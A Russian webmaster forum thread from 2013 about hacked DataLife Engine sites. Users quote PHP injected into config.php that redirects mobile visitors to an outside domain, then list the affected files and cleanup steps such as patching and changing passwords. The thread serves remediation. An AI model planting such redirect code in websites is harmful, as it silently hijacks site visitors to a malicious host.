Взлом dle проверяем файлы.
Страницы: 1 2 3 4 5 ... 7 След.
Взлом dle проверяем файлы., Вирус редирект в dle
Недавно ковырялся в бекапе сайта, случайно как-то увидел изменения config.php, и обнаружил там такой вот кодик:

Код
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) { 
    header('Location: http://statuses.ws/');
}
Сейчас буду чистить весь сайт, проверять на вирусню: пока что такую фигня обраружил в  /engine/data/config.php, /engine/init.php, index.php .Короче смотрите те файлы которые недавно были изменены, у меня вирус появился как смотрю по дате 9 января.

Или переустановить двиг?!smile:confused:
Цитата
Леон пишет:
Или переустановить двиг?!smile:confused:
Меняйте, потом отпишитесь, получилось или нет;)
А на крайний случай - нужно иметь свежие бэкапы).
Качественный рерайт/копирайт/перевод | Создание сайтов за еду! Дёшево!
Пока просто почистил, посмотрим что будет дальше. Двиг пока не охота переустанавливать слишком много модулей установлено.
Такая фигня не тока у меня:http://forum.searchengines.ru/showthread.php?s=cbc38d89875a6622c732af2d15892948&p=11292076
вот блин тоже нашел эту дрянь на 3 сайтах, кто знает откуда корни растут?
У меня тоже ((smile:mad:
Я пофиксил! сначало снес весь код левый и с офы пач поставил!
init.php
index.php
dbconfig.php
config.php 

В этих файлах сносите левый код!
Сейчас найду ссылочку фикса и скину!
dle-news.ru/bags/v97/1547-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html]Вот скачайте перезалейте файл!

Вроде проверили этот файл... дописали много чего!
Дополнительно поменяйте все пароли от баз данных и тд!  проверьте даты изменения файлов примерно тогда когда у вас изменились эти файлы и также сносите код!smile:p  Удачи вам! если поможет отпишитесь!
Думая что большинство из зараженных двигов - nulled, отсюда и проблема, но могу ошибаться... Рекомендую еще заглянуть в корневой .htaccess, там тоже бывает много чего интересного!
Такая же фигня.... smile:mad: руки оторвать...
Может кому будет полезно! Заметила что среди сайтов на DLE на одном же сервере есть зараженные и нет. Нашла чем они у меня отличаются (версии Dle разные) не заражены были сайты где файл admin.php, были переименованы.
index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php
Кучка жалких школьников плакает, вай какая беда:)
Изменено: цтуе wnet - 15 Января 2013 08:12
Цитата
цтуе wnet пишет:
Кучка жалких школьников плакает, вай какая беда:)
*смотрит как на идиота*smile:confused:
Страницы: 1 2 3 4 5 ... 7 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
20:18 ЕС душит ТикТок: прощай бесконечная лента и RPM? Что с монетизацией? 
20:14 Гугл пухнет от кеша, а нам - крошки. Разбор $114 млрд: Адсенс в минусе, Ютуб на подписках 
20:11 01.02. Апдейт 31.01 // Chrome готовит "чёрную метку" для ИИ? 
18:53 Кнопки "скрыть" и "пожаловаться" в рекламе яндекса 
15:29 OpenAI и шейхи: Цензура на продажу и "гибкие" идеалы амеров 
13:26 Как безопасно купить Гугл почту? 
10:59 WB и Ozon - новые "русские поисковики"? Яндекс теряет коммерческую выдачу 
22:35 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 
18:41 Веривикация Авито 
17:37 Продам аккаунты Gmail USA IP | Gmail MIX IP | Outlook Old 
16:31 JustProxy.Biz - Резидентные прокси без ограничения по трафику 
15:39 Создам под вашу нишу сетку сайтов-сателлитов для привлечения целевого трафика 
15:31 Вериф аккаунты АВИТО + платежи 
08:58 Мониторинг обменников Сrypto-scout.io 
22:45 Точные прогнозы на футбол 
21:04 Кулеры и БП станут золотыми? Медь по 13 штук, олово в космосе 
19:29 FIFA и Assassin’s Creed воруют пароли: В репаки зашили лютый стиллер. Чекаем логи 
19:24 Туалетные секреты: Замурчательная тема 
19:15 Сайты Рунета 
15:15 ИИ-театр для инвесторов: почему виральные посты в Moltbook писали люди и в чем подвох OpenClaw 
08:50 Гильотина для классиков: Клод доедает физические книги